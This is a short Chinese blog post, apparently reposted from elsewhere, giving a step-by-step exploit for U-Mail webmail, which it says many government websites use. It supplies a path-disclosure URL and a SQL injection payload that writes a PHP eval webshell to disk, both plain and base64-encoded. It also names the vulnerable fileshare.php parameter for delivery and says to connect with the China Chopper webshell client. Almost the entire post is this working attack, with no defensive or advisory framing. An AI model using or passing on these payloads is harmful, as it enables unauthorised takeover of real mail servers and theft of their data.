大部分政府网站U-mail存在直接拿shell漏洞

时间:2014-3-18    作者:admin    分类: 摘自网络


加入

webmail/userapply.php?execadd=333&DomainID=111
直接爆出物理地址
20140312045029_40204.jpg
然后将 aa' union select 1,2,3,4,5,6,'<?php eval($_POST1);?>',8,9,10,11,12,13,14 into outfile 'D:/umail/WorldClient/html/saknc.php'#
用base64编译一下
YWEnIHVuaW9uIHNlbGVjdCAxLDIsMyw0LDUsNiwnPD9waHAgZXZhbCgkX1BPU1QxKTs/PicsOCw5LDEwLDExLDEyLDEzLDE0IGludG8gb3V0ZmlsZSAnRDovdW1haWwvV29ybGRDbGllbnQvaHRtbC9zYWtuYy5waHAnIw==
然后 http://127.0.0.1/webmail/fileshare.php?file=加上上面编译的base64代码
可直接写入shell saknc.php
用菜刀连接http://127.0.0.1/webmail/saknc.php 密码:shell 

标签: 漏洞 webshell umail